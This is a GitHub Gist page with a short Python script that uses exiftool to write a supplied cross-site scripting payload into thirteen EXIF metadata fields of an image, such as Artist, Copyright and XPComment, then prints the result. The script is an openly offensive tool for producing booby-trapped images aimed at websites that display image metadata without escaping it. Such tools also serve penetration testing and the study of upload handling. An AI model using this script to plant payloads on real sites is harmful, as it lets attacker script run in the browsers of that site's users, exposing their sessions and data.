Skip to content

Instantly share code, notes, and snippets.

@hash3liZer
Created June 5, 2020 11:02
Show Gist options
  • Save hash3liZer/3b3ed6a4a2e3e42e6ca29c11763f7852 to your computer and use it in GitHub Desktop.
Save hash3liZer/3b3ed6a4a2e3e42e6ca29c11763f7852 to your computer and use it in GitHub Desktop.
Embedding XSS payloads in the Exif Metadata fields of and image
import sys
import subprocess
exifs = [
"ImageDescription",
"Make",
"Model",
"Software",
"Artist",
"Copyright",
"XPTitle",
"XPComment",
"XPAuthor",
"XPSubject",
"Location",
"Description",
"Author"
]
if sys.argv[1] and sys.argv[2]:
image = sys.argv[1]
xss = sys.argv[2]
for exif in exifs:
attribute = "-{0}={1}".format(exif, xss)
subprocess.call(["exiftool", attribute, image])
subprocess.call(["exiftool", image])
else:
print("No source image given")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment